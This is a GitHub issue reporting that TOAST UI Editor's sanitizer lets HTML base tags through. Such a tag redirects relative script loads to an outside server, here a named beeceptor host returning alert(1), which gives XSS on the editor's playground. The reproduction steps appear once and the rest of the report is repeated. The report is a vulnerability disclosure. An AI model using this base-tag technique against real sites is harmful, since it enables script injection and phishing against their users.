You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Base tags are not sanitized, that can lead to XSS.
To Reproduce
I'll use the ui.toast.com/tui-editor playground to demonstrate this vulnerability.
Steps to reproduce the behavior:
Create a server that returns the XSS payload, (return alert(1) for every request) you can use avocadot0ast.free.beeceptor.com while it's available (it's a free server, too many requests and it will stop serving the payload)
Hover over the links (Weekly Picks, Release Notes, FE Guide etc)
See a request to some jsons, but also /component---src-pages-index-tsx-a5b41d7b681d62c9ee9a.js
See the alert(1)
Expected behavior
Base tags should be sanitized.
Additional context
I tested this with chromium. The base tag overwrites the base url, all relative links point to that url then. I could exploit this to real XSS because there's a script dynamically loaded from a relative link when hovering over the links at the bottom of the page. Even when there's no relative scripts after the base tag, this will hijack some links and might lead to phishing or other undesired effects.
The text was updated successfully, but these errors were encountered:
Describe the bug
Base tags are not sanitized, that can lead to XSS.
To Reproduce
I'll use the ui.toast.com/tui-editor playground to demonstrate this vulnerability.
Steps to reproduce the behavior:
Expected behavior
Base tags should be sanitized.
Additional context
I tested this with chromium. The base tag overwrites the base url, all relative links point to that url then. I could exploit this to real XSS because there's a script dynamically loaded from a relative link when hovering over the links at the bottom of the page. Even when there's no relative scripts after the base tag, this will hijack some links and might lead to phishing or other undesired effects.
The text was updated successfully, but these errors were encountered: